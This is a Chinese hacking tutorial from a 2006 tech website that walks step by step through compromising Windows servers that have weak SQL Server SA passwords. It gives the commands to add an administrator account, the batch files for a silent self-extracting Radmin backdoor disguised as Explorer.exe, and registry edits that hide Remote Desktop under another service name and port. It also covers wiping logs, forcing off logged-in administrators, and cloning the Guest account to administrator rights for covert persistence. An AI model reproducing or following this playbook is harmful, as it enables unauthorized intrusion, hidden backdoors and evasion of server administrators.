注册通行证 用户名 密码
  • 文章投稿
  • 博客
  • 论坛
  • 设为首页
  • 加入收藏
jztop.com网络技术
  • 首页
  • | iT新闻
  • | 操作系统
  • | 组网建网
  • | 网络安全
  • | 程序开发
  • | 办公一族
  • | 工具软件
  • | 网页制作
  • | 多媒体制作
  • | 网吧技术
  • | 服务器
  • | 专题教程
Vista | 软件评测 | 系统备份 | 优化 | 进程 | 聊天 | 病毒 | Linux | 黑客 | 防火墙 | 数据库 | Web开发 | Java | Word | 游戏 | 32位开发 | 移动开发
当前位置:首页 > 网络安全 > 黑客攻防 > 内容正文

黑客经验谈系列之入侵3389起源完整编

发布时间:2006-10-23 07:15:00 来源:友佳学院 网友评论 0 条

【编辑提示】:本文仅供参考学习,严禁用于各类破坏行为!

这多是本人多年下来的经验。

工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

Net start telNet 开telNet服务 Net user mint mint /add 添加用户mint密码为mint Net localgroup administrators mint /add 将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;

2、在本地设置服务端(一定要生成);

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE//SYSTEM//Radmin的键值为1.reg;

4、编写一个批处理,并命名为u.bat;

@echo offNet stop r_server

5、写第二个批处理,r.bat,内容为:

@echo off@Explorer.exe /uninstall /silence@Explorer.exe /install /silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /silence@Explorer.exe /install /silence@regedit /s 1.reg@Net start r_server@del rad.exe@del 1.reg@del r.bat@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;

7、将Rad.rar制作成自解压文件;

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%//system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

四.用RADMIN客服端连接

上传文件到c://WINNT(XP是windows):

port.bat(如果是在XP下,这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门RADMIN进入TELNet。

运行c://winnt//3389.exe,重启肉鸡。

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题。

使用3389登陆,发现登陆用户已满,不用怕,我们把他踢出去。

telNet对方ip,发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c://winnt//system32//cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint,telNet对方ip,直接可以登陆对方电脑了。

使用命令:

c://query user (查看对方目前终端登陆状况。)

运行命令:

c://logoff 1(踢出去一个管理者)

再用c://query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c://winnt//log . 自己的IP .(擦PP)

c://winNet//1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

if exists (select * from dbo.sysobjects where id = object_id(N/’[dbo].[XP_cmdshell]/’) and OBJECTPROPERTY(id, N/’IsExtendedProc/’) = 1) Exec sp_dropextendedproc N/’[dbo].[XP_cmdshell]/’ GO

按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。

八.改3389端口和服务名称

修改服务器端的端口设置,注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。

第二个地方:

[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp] PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。

要重启系统才能用新端口连。(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//TermService]

的键值为mm.reg文件。编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务也行) 。再把第十行的"Description"="(这里是服务说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,这里改为Alerter)。保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)。

再在CMD下

CD c://winnt//system32 copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件) CD C://winnt sc ////127.0.0.1 config Alerter binpath= c://winnt//system32//service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)用Radmin重启肉鸡

十.使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users

用法:[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值。

如:psu –p regedit –i 157

将Guest克成管理员权限,克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//Names//Administrator的类型值。

在HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE//SAM//SAM//Domains//Account//Users//Guest和他相应的类型值的数据),然后删除Guest的配置。

2.查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行)。

3.将Guest的配置(二个REG文件导进注册表)。

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。

Net user Guest **** [修改密码]Net user Guest /active:yesNet user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用。

6.用Guest登陆后删除自己建的帐号。

Net user mint /del

整个过程结束。

最后最好把RADMIN的服务也改了,多留个后门多条路,呵呵。整个过程全部结束,这机子就真正变成你的肉鸡了。

关于 黑客 入侵3389 3389 的新闻
  • 黑客技术-ARP欺骗
  • Vista内核保护能抵挡黑客多久?
  • To菜鸟:防止黑客入侵ADSL的一些技巧
  • 美商务部称遭中国黑客攻击 1个多月不敢联网
  • 狂攻网站15小时 神秘短信黑客抢走近万账户
【评论】【收藏本文】【打印】【关闭】
上一篇文章:黑客技术-ARP欺骗
下一篇文章:看看黑客是如何攻击电子邮件系统的
讨论区
查看
已有 0 位对此新闻感兴趣的网友发表了看法
匿名发表
注册通行证 登陆
图文阅读推荐
密码攻略 黑客亲手打造QQ密码破解器
密码攻略 黑客亲手打造QQ密码破解器
活捉黑客:黑客诱捕之计算机蜜罐技术
活捉黑客:黑客诱捕之计算机蜜罐技术
千里之行始于足下 黑客技术基础知识讲解
千里之行始于足下 黑客技术基础知识讲解
黑你就这么简单 ADSL安全不容忽视
黑你就这么简单 ADSL安全不容忽视
全站资源
  • 微软官方入门教程19:轻松掌握Vista系统的快
  • 微软2008大冲击,预借Vista SP1力促Vista市
  • 在收件箱中获得 Windows Vista 的最新更新
  • 微软官方Vista入门教程全集19篇(Vista学院
  • Windows Vista 的成功将势不可挡
  • 快快抛弃Vista,拥抱XP SP3!你觉得呢?
  • 浅谈Vista系统关闭虚拟内存与使用内存盘加速
  • 嘿嘿,按下键盘上面的三个键,马上让你的Vi
  • Windows Vista的盗版率只有Windows XP的一半
  • 3DMark和PCMark Vantage新版将只支持Vista系
阅读排行
  • 黑客必学的六条系统命令
  • 千里之行始于足下 黑客技术基础知识讲解
  • 密码攻略 黑客亲手打造QQ密码破解器
  • 王者风范 2分钟入侵网站全程实录
  • 黑客新技术 灰鸽子巧妙利用全攻略
  • 秘籍:网吧入侵全攻略
  • 菜鸟必看:学习黑客技术的基本环境
  • 人小鬼大的黑客工具——QQ远控精灵
  • 先做黑客再做网管:二.黑客应掌握的基本技能
  • 先做黑客再做网管:一.
最新技术文档
  • 黑客经典教程之理解地址解析协议攻击
  • 看看黑客是如何攻击电子邮件系统的
  • 黑客经验谈系列之入侵3389起源完整编
  • 黑客技术-ARP欺骗
  • 密码攻略 黑客亲手打造QQ密码破解器
  • “正”、“邪”两类黑客的四大主要行为
  • 让你的密码成为黑客的“耻辱”
  • 活捉黑客:黑客诱捕之计算机蜜罐技术
  • 黑客精神祭 挖掘神秘黑客背后的故事
  • 我也做黑客:简单入侵个人电脑的步骤
专题教程
  • 大话G游 专题:手机病毒揭密
  • ARP攻击防范与解决方案 路由故障处理手册
  • Picasa中文版_Picasa教程 专题:清除流氓软件
  • Firefox专题 seo搜索引擎优化专区
  • 重装Windows必知的事情 装机之必备软件大行动
病毒专杀栏
  • 杀毒软件反被病毒杀 连"救命"都不能喊
  • 金山ARP防火墙
  • 还原卡神话破灭“机器狗”病毒来势汹汹
  • cctv经济半小时:你的手机现在安全吗?
  • 新挂马方式开始流行 ARP挂马称雄局域网
  • 木马和病毒清除的通用解法
  • IP地址不再冲突 查找ARP攻击者元凶
  • 教你几招识别和防御Web网页木马
  • 分析:封杀BT只是暂时的止痛药
  • QQ爆危险漏洞,“QQ游戏邀请大盗”邀请你玩病
关于我们 | 诚聘英才 | 联系我们 | 版权声明 | 网站大事 | 网站地图 | 意见建议
CopyRight 2005-2007 Jztop.Com 版权所有 未经许可 请勿转载